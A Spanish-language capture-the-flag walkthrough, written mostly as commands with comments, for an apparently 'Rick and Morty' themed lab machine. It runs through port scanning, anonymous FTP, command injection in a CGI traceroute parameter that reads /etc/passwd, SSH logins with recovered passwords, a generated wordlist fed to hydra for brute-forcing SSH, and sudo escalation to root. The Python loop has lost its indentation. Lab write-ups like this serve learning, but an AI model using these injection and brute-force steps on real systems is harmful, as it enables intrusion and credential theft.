# Escaneo básico de puertos
nmap -p- -sV 192.168.x.x
# Puertos identificados:
# - 21 (FTP)
# - 22 (SSH)
# - 80 (HTTP)
# - 9090 (HTTP)
# - 13337 (Desconocido)
# - 22222 (SSH)
# - 60000 (?)
ftp 192.168.x.x
# Usuario: anonymous
# Password: [vacío]
dirb http://192.168.x.x
# Directorios encontrados:
# - /passwords/
# - /robots.txt
# Revisar /passwords/
curl http://192.168.x.x/passwords/
# - FLAG.txt
# - passwords.html
# Revisar robots.txt
curl http://192.168.x.x/robots.txt
# - /cgi-bin/
# - Traceroute tool
# Prueba básica
http://192.168.x.x/cgi-bin/tracertool.cgi?ip=127.0.0.1
# Inyección de comandos
http://192.168.x.x/cgi-bin/tracertool.cgi?ip=127.0.0.1;id
# Lectura de archivos
http://192.168.x.x/cgi-bin/tracertool.cgi?ip=127.0.0.1;more+/etc/passwd
winterSummer# Login SSH
ssh Summer@192.168.x.x -p 22222
Password: winter
# Como usuario Summer
find / -type f -name "*.txt" 2>/dev/null
find / -type f -name "*.zip" 2>/dev/null
find / -name "*.jpg" 2>/dev/null
# Archivos importantes encontrados:
# - Safe_Password.jpg
# - journal.txt.zip
# - FLAG.txt en varios lugares
# Examinar imagen
strings Safe_Password.jpg
# Password encontrado: Meeseek
# Descomprimir archivo
unzip journal.txt.zip
Password: Meeseek
# Leer contenido
cat journal.txt
# Número encontrado: 131333
cd /home/RickSanchez
ls -la
# Encontramos: RICKS_SAFE
cd RICKS_SAFE
ls -la
# Archivo safe con permisos de ejecución
./safe 131333
# Pistas obtenidas:
# - 1 mayúscula
# - 1 número
# - Palabra de antigua banda
# Banda identificada: The Flesh Curtains
# Necesitamos crear wordlist
#!/usr/bin/python3
from string import ascii_uppercase as au, digits as ds
# Palabras de la banda
band_name = ["Flesh", "Curtains"]
# Generar combinaciones
for l in au:
for d in ds:
for n in band_name:
with open("wordlist.txt", "a") as f:
f.write(f"{l}{d}{n}\n")
hydra -l RickSanchez -P wordlist.txt 192.168.x.x ssh -s 22222
# Credenciales encontradas:
# Usuario: RickSanchez
# Password: P7Curtains
ssh RickSanchez@192.168.x.x -p 22222
Password: P7Curtains
# Verificar privilegios
sudo -l
# Usuario puede ejecutar sudo sin password
# Escalar a root
sudo su -
# ¡Acceso root conseguido!
# Verificar
id
# uid=0(root) gid=0(root)